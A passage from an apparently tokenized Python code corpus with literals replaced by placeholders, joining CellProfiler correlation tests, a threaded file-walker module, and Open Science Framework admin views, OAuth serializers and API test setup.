Image ( image1 , mask = mask1 ) <EOL> i2 = cpi . Image ( image2 , mask = mask2 ) <EOL> workspace , module = self . make_workspace ( i1 , i2 ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , cpmeas . IMAGE , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( cpmeas . IMAGE , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr , <NUM_LIT:1> ) <EOL> def test_06_01_objects ( self ) : <EOL> '''<STR_LIT>''' <EOL> labels = np . zeros ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , int ) <EOL> labels [ : <NUM_LIT:4> , : <NUM_LIT:4> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:6> : , <NUM_LIT:6> : ] = <NUM_LIT:2> <EOL> i , j = np . mgrid [ <NUM_LIT:0> : <NUM_LIT:10> , <NUM_LIT:0> : <NUM_LIT:10> ] <EOL> image1 = ( ( i + j ) % <NUM_LIT:2> ) . astype ( float ) <EOL> image2 = image1 . 
copy ( ) <EOL> image2 [ labels == <NUM_LIT:2> ] = <NUM_LIT:1> - image1 [ labels == <NUM_LIT:2> ] <EOL> i1 = cpi . Image ( image1 ) <EOL> i2 = cpi . Image ( image2 ) <EOL> o = cpo . Objects ( ) <EOL> o . segmented = labels <EOL> workspace , module = self . make_workspace ( i1 , i2 , o ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , OBJECTS_NAME , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( OBJECTS_NAME , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( len ( corr ) , <NUM_LIT:2> ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:1> ] , - <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( m . get_object_names ( ) ) , <NUM_LIT:2> ) <EOL> self . assertTrue ( OBJECTS_NAME in m . get_object_names ( ) ) <EOL> columns = module . get_measurement_columns ( None ) <EOL> image_features = m . get_feature_names ( cpmeas . IMAGE ) <EOL> object_features = m . get_feature_names ( OBJECTS_NAME ) <EOL> self . assertEqual ( len ( columns ) , len ( image_features ) + len ( object_features ) ) <EOL> for column in columns : <EOL> if column [ <NUM_LIT:0> ] == cpmeas . IMAGE : <EOL> self . assertTrue ( column [ <NUM_LIT:1> ] in image_features ) <EOL> else : <EOL> self . assertEqual ( column [ <NUM_LIT:0> ] , OBJECTS_NAME ) <EOL> self . assertTrue ( column [ <NUM_LIT:1> ] in object_features ) <EOL> def test_06_02_cropped_objects ( self ) : <EOL> '''<STR_LIT>''' <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image1 = np . random . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> i1 = cpi . Image ( image1 ) <EOL> crop_mask = np . zeros ( ( <NUM_LIT:20> , <NUM_LIT:20> ) , bool ) <EOL> crop_mask [ <NUM_LIT:5> : <NUM_LIT:15> , <NUM_LIT:5> : <NUM_LIT:15> ] = True <EOL> i2 = cpi . Image ( image1 [ <NUM_LIT:5> : <NUM_LIT:15> , <NUM_LIT:5> : <NUM_LIT:15> ] , crop_mask = crop_mask ) <EOL> labels = np . 
zeros ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , int ) <EOL> labels [ : <NUM_LIT:4> , : <NUM_LIT:4> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:6> : , <NUM_LIT:6> : ] = <NUM_LIT:2> <EOL> o = cpo . Objects ( ) <EOL> o . segmented = labels <EOL> o . parent_image = i2 <EOL> workspace , module = self . make_workspace ( i1 , i2 , o ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , OBJECTS_NAME , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( OBJECTS_NAME , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:1> ] , <NUM_LIT:1> ) <EOL> def test_06_03_no_objects ( self ) : <EOL> '''<STR_LIT>''' <EOL> labels = np . zeros ( ( <NUM_LIT:10> , <NUM_LIT:10> ) , int ) <EOL> i , j = np . mgrid [ <NUM_LIT:0> : <NUM_LIT:10> , <NUM_LIT:0> : <NUM_LIT:10> ] <EOL> image1 = ( ( i + j ) % <NUM_LIT:2> ) . astype ( float ) <EOL> image2 = image1 . copy ( ) <EOL> i1 = cpi . Image ( image1 ) <EOL> i2 = cpi . Image ( image2 ) <EOL> o = cpo . Objects ( ) <EOL> o . segmented = labels <EOL> workspace , module = self . make_workspace ( i1 , i2 , o ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , OBJECTS_NAME , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( OBJECTS_NAME , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( len ( corr ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( m . get_object_names ( ) ) , <NUM_LIT:2> ) <EOL> self . assertTrue ( OBJECTS_NAME in m . get_object_names ( ) ) <EOL> columns = module . get_measurement_columns ( None ) <EOL> image_features = m . get_feature_names ( cpmeas . IMAGE ) <EOL> object_features = m . get_feature_names ( OBJECTS_NAME ) <EOL> self . 
assertEqual ( len ( columns ) , len ( image_features ) + len ( object_features ) ) <EOL> for column in columns : <EOL> if column [ <NUM_LIT:0> ] == cpmeas . IMAGE : <EOL> self . assertTrue ( column [ <NUM_LIT:1> ] in image_features ) <EOL> else : <EOL> self . assertEqual ( column [ <NUM_LIT:0> ] , OBJECTS_NAME ) <EOL> self . assertTrue ( column [ <NUM_LIT:1> ] in object_features ) <EOL> def test_06_04_wrong_size ( self ) : <EOL> '''<STR_LIT>''' <EOL> np . random . seed ( <NUM_LIT:0> ) <EOL> image1 = np . random . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> i1 = cpi . Image ( image1 ) <EOL> labels = np . zeros ( ( <NUM_LIT:10> , <NUM_LIT:30> ) , int ) <EOL> labels [ : <NUM_LIT:4> , : <NUM_LIT:4> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT:6> : , <NUM_LIT:6> : ] = <NUM_LIT:2> <EOL> o = cpo . Objects ( ) <EOL> o . segmented = labels <EOL> workspace , module = self . make_workspace ( i1 , i1 , o ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> mi = module . get_measurement_images ( None , OBJECTS_NAME , "<STR_LIT>" , "<STR_LIT>" ) <EOL> corr = m . get_current_measurement ( OBJECTS_NAME , "<STR_LIT>" % mi [ <NUM_LIT:0> ] ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertAlmostEqual ( corr [ <NUM_LIT:1> ] , <NUM_LIT:1> ) <EOL> def test_06_05_last_object_masked ( self ) : <EOL> r = np . random . RandomState ( ) <EOL> r . seed ( <NUM_LIT> ) <EOL> image1 = r . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> image2 = r . uniform ( size = ( <NUM_LIT:20> , <NUM_LIT:20> ) ) <EOL> labels = np . zeros ( ( <NUM_LIT:20> , <NUM_LIT:20> ) , int ) <EOL> labels [ <NUM_LIT:3> : <NUM_LIT:8> , <NUM_LIT:3> : <NUM_LIT:8> ] = <NUM_LIT:1> <EOL> labels [ <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> ] = <NUM_LIT:2> <EOL> mask = labels != <NUM_LIT:2> <EOL> objects = cpo . Objects ( ) <EOL> objects . 
segmented = labels <EOL> for mask1 , mask2 in ( ( mask , None ) , ( None , mask ) , ( mask , mask ) ) : <EOL> workspace , module = self . make_workspace ( <EOL> cpi . Image ( image1 , mask = mask1 ) , <EOL> cpi . Image ( image2 , mask = mask2 ) , <EOL> objects ) <EOL> module . run ( workspace ) <EOL> m = workspace . measurements <EOL> feature = M . F_CORRELATION_FORMAT % ( IMAGE1_NAME , IMAGE2_NAME ) <EOL> values = m [ OBJECTS_NAME , feature ] <EOL> self . assertEqual ( len ( values ) , <NUM_LIT:2> ) <EOL> self . assertTrue ( np . isnan ( values [ <NUM_LIT:1> ] ) ) </s>
<s> </s>
<s> '''<STR_LIT>''' <EOL> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> import os <EOL> import threading <EOL> import urllib <EOL> import uuid <EOL> pause_lock = threading . Lock ( ) <EOL> pause_condition = threading . Condition ( pause_lock ) <EOL> THREAD_RUNNING = "<STR_LIT>" <EOL> THREAD_STOP = "<STR_LIT>" <EOL> THREAD_STOPPING = "<STR_LIT>" <EOL> THREAD_PAUSE = "<STR_LIT>" <EOL> THREAD_RESUME = "<STR_LIT>" <EOL> class InterruptException ( Exception ) : <EOL> def __init__ ( self , * args ) : <EOL> super ( self . __class__ , self ) . __init__ ( * args ) <EOL> class Checkpoint ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self ) : <EOL> self . state = THREAD_RUNNING <EOL> def set_state ( self , state ) : <EOL> with pause_lock : <EOL> if state == THREAD_RESUME : <EOL> state = THREAD_RUNNING <EOL> self . state = state <EOL> pause_condition . notify_all ( ) <EOL> def wait ( self ) : <EOL> with pause_lock : <EOL> if self . state == THREAD_STOP : <EOL> raise InterruptException ( ) <EOL> while self . state == THREAD_PAUSE : <EOL> pause_condition . wait ( ) <EOL> exts_that_need_allow_open_files = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> def get_metadata ( path ) : <EOL> import subimager . client as C <EOL> import subimager . omexml as O <EOL> if path . lower ( ) . endswith ( exts_that_need_allow_open_files ) : <EOL> result = C . get_metadata ( path , allowopenfiles = "<STR_LIT:yes>" ) <EOL> else : <EOL> result = C . get_metadata ( path ) <EOL> if result is not None : <EOL> return O . OMEXML ( result ) <EOL> return None <EOL> def walk_in_background ( path , callback_fn , completed_fn = None , metadata_fn = None ) : <EOL> '''<STR_LIT>''' <EOL> checkpoint = Checkpoint ( ) <EOL> def report ( dirpath , dirnames , filenames ) : <EOL> if checkpoint . 
state != THREAD_STOP : <EOL> callback_fn ( dirpath , dirnames , filenames ) <EOL> def metadata_report ( path , metadata ) : <EOL> if checkpoint . state != THREAD_STOP : <EOL> metadata_fn ( path , metadata ) <EOL> def complete ( ) : <EOL> if checkpoint . state != THREAD_STOP : <EOL> completed_fn ( ) <EOL> def fn ( ) : <EOL> try : <EOL> path_list = [ ] <EOL> for dirpath , dirnames , filenames in os . walk ( path ) : <EOL> checkpoint . wait ( ) <EOL> if len ( filenames ) == <NUM_LIT:0> : <EOL> continue <EOL> import wx <EOL> wx . CallAfter ( report , dirpath , dirnames , filenames ) <EOL> if metadata_fn is not None : <EOL> path_list += [ os . path . join ( dirpath , filename ) <EOL> for filename in filenames ] <EOL> for subpath in sorted ( path_list ) : <EOL> checkpoint . wait ( ) <EOL> try : <EOL> metadata = get_metadata ( "<STR_LIT>" + urllib . pathname2url ( subpath ) ) <EOL> import wx <EOL> wx . CallAfter ( metadata_report , subpath , metadata ) <EOL> except : <EOL> logger . info ( "<STR_LIT>" % subpath ) <EOL> except InterruptException : <EOL> logger . info ( "<STR_LIT>" ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> finally : <EOL> if completed_fn is not None : <EOL> import wx <EOL> wx . CallAfter ( complete ) <EOL> thread = threading . Thread ( target = fn ) <EOL> thread . setDaemon ( True ) <EOL> thread . start ( ) <EOL> return checkpoint . set_state <EOL> def get_metadata_in_background ( pathnames , fn_callback , fn_completed = None ) : <EOL> '''<STR_LIT>''' <EOL> checkpoint = Checkpoint ( ) <EOL> def metadata_fn ( path , metadata ) : <EOL> if checkpoint . state != THREAD_STOP : <EOL> fn_callback ( path , metadata ) <EOL> def completion_fn ( ) : <EOL> if checkpoint . state != THREAD_STOP : <EOL> fn_completed ( ) <EOL> def fn ( ) : <EOL> try : <EOL> for path in pathnames : <EOL> checkpoint . wait ( ) <EOL> try : <EOL> if not path . startswith ( "<STR_LIT>" ) : <EOL> url = "<STR_LIT>" + urllib . 
pathname2url ( path ) <EOL> else : <EOL> url = path <EOL> metadata = get_metadata ( url ) <EOL> import wx <EOL> wx . CallAfter ( metadata_fn , path , metadata ) <EOL> except : <EOL> logger . info ( "<STR_LIT>" % path ) <EOL> except InterruptException : <EOL> logger . info ( "<STR_LIT>" ) <EOL> except : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> finally : <EOL> if fn_completed is not None : <EOL> wx . CallAfter ( completion_fn ) <EOL> thread = threading . Thread ( target = fn ) <EOL> thread . start ( ) <EOL> return checkpoint . set_state <EOL> class WalkCollection ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , fn_on_completed ) : <EOL> self . fn_on_completed = fn_on_completed <EOL> self . stop_functions = { } <EOL> self . paused_tasks = [ ] <EOL> self . state = THREAD_STOP <EOL> def on_complete ( self , uid ) : <EOL> if self . stop_functions . has_key ( uid ) : <EOL> del self . stop_functions [ uid ] <EOL> if len ( self . stop_functions ) == <NUM_LIT:0> : <EOL> self . state = THREAD_STOP <EOL> self . fn_on_completed ( ) <EOL> def walk_in_background ( self , path , callback_fn , metadata_fn = None ) : <EOL> if self . state == THREAD_PAUSE : <EOL> self . paused_tasks . append ( <EOL> lambda path , callback_fn , metadata_fn : <EOL> self . walk_in_background ( path , callback_fn , metadata_fn ) ) <EOL> else : <EOL> key = uuid . uuid4 ( ) <EOL> fn_on_complete = lambda key = key : self . on_complete ( key ) <EOL> self . stop_functions [ key ] = walk_in_background ( <EOL> path , callback_fn , fn_on_complete , metadata_fn ) <EOL> if self . state == THREAD_STOP : <EOL> self . state = THREAD_RUNNING <EOL> def get_metadata_in_background ( self , pathnames , fn_callback ) : <EOL> if self . state == THREAD_PAUSE : <EOL> self . paused_tasks . append ( <EOL> lambda pathnames , fn_callback : <EOL> self . get_metadata_in_background ( pathnames , fn_callback ) ) <EOL> else : <EOL> key = uuid . uuid4 ( ) <EOL> fn_on_complete = lambda key = key : self . 
on_complete ( key ) <EOL> self . stop_functions [ key ] = get_metadata_in_background ( <EOL> pathnames , fn_callback , fn_on_complete ) <EOL> def get_state ( self ) : <EOL> return self . state <EOL> def pause ( self ) : <EOL> if self . state == THREAD_RUNNING : <EOL> for stop_fn in self . stop_functions . values ( ) : <EOL> stop_fn ( THREAD_PAUSE ) <EOL> self . state = THREAD_PAUSE <EOL> def resume ( self ) : <EOL> if self . state == THREAD_PAUSE : <EOL> for stop_fn in self . stop_functions . values ( ) : <EOL> stop_fn ( THREAD_RESUME ) <EOL> for fn_task in self . paused_tasks : <EOL> fn_task ( ) <EOL> self . paused_tasks = [ ] <EOL> self . state = THREAD_RUNNING <EOL> def stop ( self ) : <EOL> if self . state in ( THREAD_RUNNING , THREAD_PAUSE ) : <EOL> for stop_fn in self . stop_functions . values ( ) : <EOL> stop_fn ( THREAD_STOP ) <EOL> self . paused_tasks = [ ] <EOL> self . state = THREAD_STOPPING </s>
<s> import os <EOL> SYSTEM_CONFIG_NAME = "<STR_LIT>" . upper ( ) + "<STR_LIT>" <EOL> SYSTEM_CONFIG_PATH = "<STR_LIT>" <EOL> env_config = os . environ . get ( SYSTEM_CONFIG_NAME ) <EOL> if env_config : <EOL> SYSTEM_CONFIG_PATH = "<STR_LIT>" + env_config <EOL> SYSTEM_BLUEPRINTS = ( <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from datetime import datetime <EOL> from django . views . generic import ListView , DeleteView <EOL> from django . shortcuts import redirect <EOL> from django . views . defaults import page_not_found <EOL> from modularodm import Q <EOL> from website . models import Node , User , NodeLog <EOL> from admin . base . views import GuidFormView , GuidView <EOL> from admin . base . utils import OSFAdmin <EOL> from admin . common_auth . logs import ( <EOL> update_admin_log , <EOL> NODE_REMOVED , <EOL> NODE_RESTORED , <EOL> CONTRIBUTOR_REMOVED <EOL> ) <EOL> from admin . nodes . templatetags . node_extras import reverse_node <EOL> from admin . nodes . serializers import serialize_node , serialize_simple_user <EOL> class NodeFormView ( OSFAdmin , GuidFormView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> object_type = '<STR_LIT>' <EOL> @ property <EOL> def success_url ( self ) : <EOL> return reverse_node ( self . guid ) <EOL> class NodeRemoveContributorView ( OSFAdmin , DeleteView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> def delete ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> node , user = self . get_object ( ) <EOL> if node . remove_contributor ( user , None , log = False ) : <EOL> update_admin_log ( <EOL> user_id = self . request . user . id , <EOL> object_id = node . pk , <EOL> object_repr = '<STR_LIT>' , <EOL> message = '<STR_LIT>' . format ( <EOL> user . pk , node . pk <EOL> ) , <EOL> action_flag = CONTRIBUTOR_REMOVED <EOL> ) <EOL> osf_log = NodeLog ( <EOL> action = NodeLog . CONTRIB_REMOVED , <EOL> user = None , <EOL> params = { <EOL> '<STR_LIT>' : node . parent_id , <EOL> '<STR_LIT>' : node . pk , <EOL> '<STR_LIT>' : user . pk <EOL> } , <EOL> date = datetime . utcnow ( ) , <EOL> should_hide = True , <EOL> ) <EOL> osf_log . 
save ( ) <EOL> except AttributeError : <EOL> return page_not_found ( <EOL> request , <EOL> AttributeError ( <EOL> '<STR_LIT>' . format ( <EOL> self . context_object_name . title ( ) , <EOL> kwargs . get ( '<STR_LIT>' ) <EOL> ) <EOL> ) <EOL> ) <EOL> return redirect ( reverse_node ( self . kwargs . get ( '<STR_LIT>' ) ) ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = { } <EOL> node , user = kwargs . get ( '<STR_LIT:object>' ) <EOL> context . setdefault ( '<STR_LIT>' , node . pk ) <EOL> context . setdefault ( '<STR_LIT:user>' , serialize_simple_user ( ( user . pk , None ) ) ) <EOL> return super ( NodeRemoveContributorView , self ) . get_context_data ( ** context ) <EOL> def get_object ( self , queryset = None ) : <EOL> return ( Node . load ( self . kwargs . get ( '<STR_LIT>' ) ) , <EOL> User . load ( self . kwargs . get ( '<STR_LIT>' ) ) ) <EOL> class NodeDeleteView ( OSFAdmin , DeleteView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> object = None <EOL> def delete ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> node = self . get_object ( ) <EOL> flag = None <EOL> osf_flag = None <EOL> message = None <EOL> if node . is_deleted : <EOL> node . is_deleted = False <EOL> node . deleted_date = None <EOL> flag = NODE_RESTORED <EOL> message = '<STR_LIT>' . format ( node . pk ) <EOL> osf_flag = NodeLog . NODE_CREATED <EOL> elif not node . is_registration : <EOL> node . is_deleted = True <EOL> node . deleted_date = datetime . utcnow ( ) <EOL> flag = NODE_REMOVED <EOL> message = '<STR_LIT>' . format ( node . pk ) <EOL> osf_flag = NodeLog . NODE_REMOVED <EOL> node . save ( ) <EOL> if flag is not None : <EOL> update_admin_log ( <EOL> user_id = self . request . user . id , <EOL> object_id = node . 
pk , <EOL> object_repr = '<STR_LIT>' , <EOL> message = message , <EOL> action_flag = flag <EOL> ) <EOL> if osf_flag is not None : <EOL> osf_log = NodeLog ( <EOL> action = osf_flag , <EOL> user = None , <EOL> params = { <EOL> '<STR_LIT>' : node . parent_id , <EOL> } , <EOL> date = datetime . utcnow ( ) , <EOL> should_hide = True , <EOL> ) <EOL> osf_log . save ( ) <EOL> except AttributeError : <EOL> return page_not_found ( <EOL> request , <EOL> AttributeError ( <EOL> '<STR_LIT>' . format ( <EOL> self . context_object_name . title ( ) , <EOL> kwargs . get ( '<STR_LIT>' ) <EOL> ) <EOL> ) <EOL> ) <EOL> return redirect ( reverse_node ( self . kwargs . get ( '<STR_LIT>' ) ) ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = { } <EOL> context . setdefault ( '<STR_LIT>' , kwargs . get ( '<STR_LIT:object>' ) . pk ) <EOL> return super ( NodeDeleteView , self ) . get_context_data ( ** context ) <EOL> def get_object ( self , queryset = None ) : <EOL> return Node . load ( self . kwargs . get ( '<STR_LIT>' ) ) <EOL> class NodeView ( OSFAdmin , GuidView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> def get_object ( self , queryset = None ) : <EOL> return serialize_node ( Node . load ( self . kwargs . get ( '<STR_LIT>' ) ) ) <EOL> class RegistrationListView ( OSFAdmin , ListView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> paginate_by = <NUM_LIT:10> <EOL> paginate_orphans = <NUM_LIT:1> <EOL> ordering = '<STR_LIT>' <EOL> context_object_name = '<STR_LIT>' <EOL> def get_queryset ( self ) : <EOL> query = ( <EOL> Q ( '<STR_LIT>' , '<STR_LIT>' , True ) <EOL> ) <EOL> return Node . find ( query ) . sort ( self . ordering ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> query_set = kwargs . pop ( '<STR_LIT>' , self . object_list ) <EOL> page_size = self . get_paginate_by ( query_set ) <EOL> paginator , page , query_set , is_paginated = self . 
paginate_queryset ( <EOL> query_set , page_size ) <EOL> return { <EOL> '<STR_LIT>' : map ( serialize_node , query_set ) , <EOL> '<STR_LIT>' : page , <EOL> } </s>
<s> from django . core . validators import URLValidator <EOL> from rest_framework import serializers as ser <EOL> from modularodm import Q <EOL> from website . models import ApiOAuth2Application <EOL> from api . base . serializers import JSONAPISerializer , LinksField , IDField , TypeField <EOL> from api . base . utils import absolute_reverse <EOL> class ApiOAuthApplicationBaseSerializer ( JSONAPISerializer ) : <EOL> """<STR_LIT>""" <EOL> id = IDField ( source = '<STR_LIT>' , read_only = True , help_text = '<STR_LIT>' ) <EOL> type = TypeField ( ) <EOL> client_id = ser . CharField ( help_text = '<STR_LIT>' , <EOL> read_only = True ) <EOL> client_secret = ser . CharField ( help_text = '<STR_LIT>' , <EOL> read_only = True ) <EOL> links = LinksField ( { <EOL> '<STR_LIT:html>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> def absolute_url ( self , obj ) : <EOL> return obj . absolute_url <EOL> def get_absolute_url ( self , obj ) : <EOL> return obj . get_absolute_url ( ) <EOL> def reset_url ( self , obj ) : <EOL> return absolute_reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : obj . client_id } ) <EOL> class Meta : <EOL> type_ = '<STR_LIT>' <EOL> class ApiOAuth2ApplicationSerializer ( ApiOAuthApplicationBaseSerializer ) : <EOL> """<STR_LIT>""" <EOL> id = IDField ( source = '<STR_LIT>' , read_only = True , help_text = '<STR_LIT>' ) <EOL> type = TypeField ( ) <EOL> name = ser . CharField ( help_text = '<STR_LIT>' , <EOL> required = True ) <EOL> description = ser . CharField ( help_text = '<STR_LIT>' , <EOL> required = False , <EOL> allow_blank = True ) <EOL> home_url = ser . CharField ( help_text = "<STR_LIT>" , <EOL> required = True , <EOL> validators = [ URLValidator ( ) ] , <EOL> label = "<STR_LIT>" ) <EOL> callback_url = ser . CharField ( help_text = '<STR_LIT>' , <EOL> required = True , <EOL> validators = [ URLValidator ( ) ] , <EOL> label = "<STR_LIT>" ) <EOL> owner = ser . 
CharField ( help_text = '<STR_LIT>' , <EOL> read_only = True , <EOL> source = '<STR_LIT>' ) <EOL> date_created = ser . DateTimeField ( help_text = '<STR_LIT>' , <EOL> read_only = True ) <EOL> def create ( self , validated_data ) : <EOL> instance = ApiOAuth2Application ( ** validated_data ) <EOL> instance . save ( ) <EOL> return instance <EOL> def update ( self , instance , validated_data ) : <EOL> assert isinstance ( instance , ApiOAuth2Application ) , '<STR_LIT>' <EOL> for attr , value in validated_data . iteritems ( ) : <EOL> setattr ( instance , attr , value ) <EOL> instance . save ( ) <EOL> return instance <EOL> class ApiOAuth2ApplicationDetailSerializer ( ApiOAuth2ApplicationSerializer ) : <EOL> """<STR_LIT>""" <EOL> id = IDField ( source = '<STR_LIT>' , required = True , help_text = '<STR_LIT>' ) <EOL> class ApiOAuth2ApplicationResetSerializer ( ApiOAuth2ApplicationDetailSerializer ) : <EOL> def absolute_url ( self , obj ) : <EOL> obj = ApiOAuth2Application . find_one ( Q ( '<STR_LIT>' , '<STR_LIT>' , obj [ '<STR_LIT>' ] ) ) <EOL> return obj . absolute_url <EOL> def reset_url ( self , obj ) : <EOL> return absolute_reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : obj [ '<STR_LIT>' ] } ) </s>
<s> from django . conf . urls import url <EOL> from api . collections import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . CollectionList . as_view ( ) , name = views . CollectionList . view_name ) , <EOL> url ( r'<STR_LIT>' , views . CollectionDetail . as_view ( ) , name = views . CollectionDetail . view_name ) , <EOL> url ( r'<STR_LIT>' , views . LinkedNodesList . as_view ( ) , name = views . LinkedNodesList . view_name ) , <EOL> url ( r'<STR_LIT>' , views . NodeLinksList . as_view ( ) , name = views . NodeLinksList . view_name ) , <EOL> url ( r'<STR_LIT>' , views . NodeLinksDetail . as_view ( ) , name = views . NodeLinksDetail . view_name ) , <EOL> url ( r'<STR_LIT>' , views . CollectionLinkedNodesRelationship . as_view ( ) , name = views . CollectionLinkedNodesRelationship . view_name ) , <EOL> ] </s>
<s> from rest_framework import serializers as ser <EOL> from rest_framework import exceptions <EOL> from framework . auth . oauth_scopes import public_scopes <EOL> from website . models import ApiOAuth2PersonalToken <EOL> from api . base . serializers import JSONAPISerializer , LinksField , IDField , TypeField <EOL> class ApiOAuth2PersonalTokenSerializer ( JSONAPISerializer ) : <EOL> """<STR_LIT>""" <EOL> id = IDField ( source = '<STR_LIT>' , read_only = True , help_text = '<STR_LIT>' ) <EOL> type = TypeField ( ) <EOL> name = ser . CharField ( help_text = '<STR_LIT>' , <EOL> required = True ) <EOL> owner = ser . CharField ( help_text = '<STR_LIT>' , <EOL> read_only = True , <EOL> source = '<STR_LIT>' ) <EOL> scopes = ser . CharField ( help_text = '<STR_LIT>' , <EOL> required = True ) <EOL> token_id = ser . CharField ( read_only = True , allow_blank = True ) <EOL> class Meta : <EOL> type_ = '<STR_LIT>' <EOL> links = LinksField ( { <EOL> '<STR_LIT:html>' : '<STR_LIT>' <EOL> } ) <EOL> def absolute_url ( self , obj ) : <EOL> return obj . absolute_url <EOL> def get_absolute_url ( self , obj ) : <EOL> return self . absolute_url ( obj ) <EOL> def to_representation ( self , obj , envelope = '<STR_LIT:data>' ) : <EOL> data = super ( ApiOAuth2PersonalTokenSerializer , self ) . to_representation ( obj , envelope = envelope ) <EOL> if not self . context [ '<STR_LIT>' ] . method == '<STR_LIT:POST>' : <EOL> if '<STR_LIT:data>' in data : <EOL> data [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] . pop ( '<STR_LIT>' ) <EOL> else : <EOL> data [ '<STR_LIT>' ] . pop ( '<STR_LIT>' ) <EOL> return data <EOL> def create ( self , validated_data ) : <EOL> validate_requested_scopes ( validated_data ) <EOL> instance = ApiOAuth2PersonalToken ( ** validated_data ) <EOL> instance . 
save ( ) <EOL> return instance <EOL> def update ( self , instance , validated_data ) : <EOL> validate_requested_scopes ( validated_data ) <EOL> assert isinstance ( instance , ApiOAuth2PersonalToken ) , '<STR_LIT>' <EOL> instance . deactivate ( save = False ) <EOL> instance . reload ( ) <EOL> for attr , value in validated_data . iteritems ( ) : <EOL> if attr == '<STR_LIT>' : <EOL> continue <EOL> else : <EOL> setattr ( instance , attr , value ) <EOL> instance . save ( ) <EOL> return instance <EOL> def validate_requested_scopes ( validated_data ) : <EOL> scopes_set = set ( validated_data [ '<STR_LIT>' ] . split ( '<STR_LIT:U+0020>' ) ) <EOL> for scope in scopes_set : <EOL> if scope not in public_scopes or not public_scopes [ scope ] . is_public : <EOL> raise exceptions . ValidationError ( '<STR_LIT>' ) </s>
<s> from nose . tools import * <EOL> from tests . base import ApiTestCase <EOL> from tests . factories import InstitutionFactory , AuthUserFactory , RegistrationFactory , RetractedRegistrationFactory <EOL> from framework . auth import Auth <EOL> from api . base . settings . defaults import API_BASE <EOL> class TestInstitutionRegistrationList ( ApiTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestInstitutionRegistrationList , self ) . setUp ( ) <EOL> self . institution = InstitutionFactory ( ) <EOL> self . registration1 = RegistrationFactory ( is_public = True , is_registration = True ) <EOL> self . registration1 . primary_institution = self . institution <EOL> self . registration1 . save ( ) <EOL> self . user1 = AuthUserFactory ( ) <EOL> self . user2 = AuthUserFactory ( ) <EOL> self . registration2 = RegistrationFactory ( creator = self . user1 , is_public = False , is_registration = True ) <EOL> self . registration2 . primary_institution = self . institution <EOL> self . registration2 . add_contributor ( self . user2 , auth = Auth ( self . user1 ) ) <EOL> self . registration2 . save ( ) <EOL> self . registration3 = RegistrationFactory ( creator = self . user2 , is_public = False , is_registration = True ) <EOL> self . registration3 . primary_institution = self . institution <EOL> self . registration3 . save ( ) <EOL> self . institution_node_url = 